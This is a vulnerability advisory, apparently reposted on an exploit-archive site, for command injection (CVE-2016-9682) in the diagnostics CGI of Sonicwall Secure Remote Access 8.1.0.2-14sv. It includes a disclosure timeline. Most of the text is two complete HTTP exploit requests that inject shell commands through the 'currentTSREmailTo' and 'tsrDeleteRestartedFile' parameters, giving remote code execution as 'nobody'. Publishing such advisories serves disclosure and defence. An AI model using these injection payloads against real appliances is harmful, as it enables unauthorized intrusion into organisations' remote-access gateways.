Home / os / winmobile

Sonicwall Secure Remote Access (SRA) 8.1.0.2-14sv Command Injection

Posted on 22 July 2017

Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities Vendor: Sonicwall (Dell) Product: Secure Remote Access (SRA) Version: 8.1.0.2-14sv Platform: Embedded Linux Discovery: Russell Sanford of Critical Start (www.CriticalStart.com) CVE: cve-2016-9682 Tested against version 8.1.0.2-14sv on 11/28/16 (fully updated) Description: The Sonicwall Secure Remote Access server (ver 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in it's web administrative interface. These vulnerabilies occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile' or 'currentTSREmailTo' variables before making a call to system() allowing for remote command injection. Exploitation of this vulnerability yeilds shell access to the remote machine under the useraccount 'nobody' Impact: Remote Code Execution Exploit #1 ----------------------------------------------------------------- GET /cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23 HTTP/1.1 Host: 192.168.84.155 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://192.168.84.155/cgi-bin/diagnostics Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=license; swap=dEVySFNhTXl5V3NLSXNWUFUzVzBNNTJJQ1o2WXpCODNrOGZYUGxYazJOZz0= Exploit #2 ----------------------------------------------------------------- GET /cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23 HTTP/1.1 Host: 192.168.84.155 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://192.168.84.155/cgi-bin/diagnostics Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=sslcert; swap=dDdWMjhSYzlzMEZBd3kwQ29rTzZxQWFKdmxUSU5SRFVBQTRGRWk5UzJXVT0= Timeline: 11/14/16 - Discovered in audit 11/20/16 - POC msf exploit written 11/28/16 - Contacted mitre for CVE 11/30/16 - CVE received from mitre (CVE-2016-9682) 11/30/16 - Dell notified through Sonicwall vuln reporting

 

TOP